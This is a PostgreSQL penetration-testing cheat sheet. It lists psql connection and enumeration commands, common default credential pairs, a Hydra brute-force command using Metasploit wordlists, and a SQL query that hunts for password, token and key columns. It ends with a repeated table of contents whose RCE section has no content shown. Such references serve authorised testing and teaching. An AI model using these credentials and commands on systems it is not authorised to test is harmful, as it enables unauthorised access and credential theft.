Connect & Basic Enum

psql -U <myuser> # Open psql console with user
psql -h <host> -U <username> -d <database> # Remote connection
psql -h <host> -p <port> -U <username> <database> # Remote connection speocify port

Default credentials:
postgres : postgres
postgres : password
postgres : admin
admin : admin
admin : password

Disable pager inside `psql`

\\pset pager off

Bruteforce login

Hydra

hydra -L /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt -P /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt <IP> <DATABASE i.e postgres>

Enumerate databases and tables

\\list # List databases
\\c <database> # use the database
\\d # List tables

Find sensitive columns

SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE column_name LIKE '%password%' OR column_name LIKE '%pass%' OR column_name LIKE '%pwd%' OR column_name LIKE '%secret%' OR column_name LIKE '%token%'  OR column_name LIKE '%key%' OR column_name LIKE '%auth%';

Show content of a table

SELECT *
FROM <table_name>
LIMIT 10;

Enumerate users roles

\\du+

Connect & Basic Enum

Disable pager inside psql

Bruteforce login

Hydra

Enumerate databases and tables

Find sensitive columns

Show content of a table

Enumerate users roles

RCE & command execution

Disable pager inside `psql`